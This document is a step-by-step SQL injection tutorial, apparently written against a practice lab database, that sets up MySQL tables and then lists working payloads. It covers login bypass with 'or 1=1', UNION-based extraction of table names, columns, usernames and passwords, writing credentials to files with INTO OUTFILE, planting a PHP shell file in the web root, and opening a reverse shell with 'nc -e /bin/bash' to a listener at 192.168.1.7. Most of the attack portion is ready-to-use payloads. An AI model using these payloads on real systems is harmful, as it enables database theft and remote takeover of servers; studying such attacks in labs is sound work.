SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

SQL is a standard language for storing, manipulating and retrieving data in databases.

1. Start mysql service and login.

2. Create database name security.

Syntax - create database Database_name;

Then use show tables; command to check tables exist in database.

3. Now create table user and add column to it.

Syntax - Create table table_name(Column_name1 data_type, Column_name2 datatype, ....);

4. Insert values in table.

Syntax - Insert into table_name(Column_name1, Column_name2, ....) values (Value1, Value2, ....);

5. To select all data in table user

command - Select * from user;

6. To select database. use command - select database();

7. To see all username present in table user.

command - select username from user;

8. Login query - Select password from user where username = 'root';

Query - Select password from user where username='root';

1. payload - username='root ' or '1' = '1 ';

2. To select first password field. use payload - username='root ' or '1' = '1' limit 1 # ';

3. To select first two password field. use payload - username='root ' or '1' = '1' limit 0,2 # ';

4. To select second password field only. Use payload - username='root ' or '1' = '1' limit 1,1 # ';

5. For 3rd password field. use payload - username='root ' or '1' = '1' limit 2,1 # ';

1. id=1

2. To check error-based sql exists. Type '.

Payload- ?id=1'

3. Payload - ?id=' or 'a'='a

4. Try to balance sql statement ?id=' --+

5. payload - ?id=' order by 1 --+ To get no. of column.

6. Increase column no. until got sql error.

payload - ?id=' order by 4 --+

Here it gives Unknown column '4' in 'order clause' error it means there are 3 column exists.

7. payload = ?id=' union select 1,2,3 --+ —> for vulnerable column. Here 2,3 are reflected from database means 2nd and 3rd column is vulnerable to sql injection.

8. Database and version

Payload - ?id=-99' union select 1,database(), version() --+

 Database - security 
 Version - 5.1.73

9. select table_name from information_schema.tables; - used to retrieve table from another database

10. select table_name from information_schema.tables where table_schema=database(); - To retrieve table from current database

11. Payload - ?id=-99' union select 1,2,table_name from information_schema.tables where table_schema=database() --+

12. use group_concat() to retrieve all tables

Payload - ?id=-99' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

13. To retrieve table in login field(2nd column).

Payload -

1. ?id=-99' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

2. ?id=-99' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

14. To retrieve column names.

Payload - ?id=-99' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

15. To retrieve all usernames and password from table users

Payload - ?id=-99' union select 1,group_concat(username),group_concat(password) from users --+

1. Retrieve data from table user.

2. To save result use command - select * from users into outfile "/tmp/sql_file";

3. To save password in temp folder.

Payload- ?id=-99' union select 1,2,password from users into outfile "/tmp/cred" --+

   Payload -  **?id=-99' union select 1,2,"Awesome" into outfile "/tmp/cred1" --+**

Payload- ?id=-99' union select 1,2,"" into outfile "/var/www/html/write/shell.php" --+

a. Start listening on port using nc command nc -nlvp 6001

b. use command nc -e /bin/bash 192.168.1.7 6001 to take reverse shell.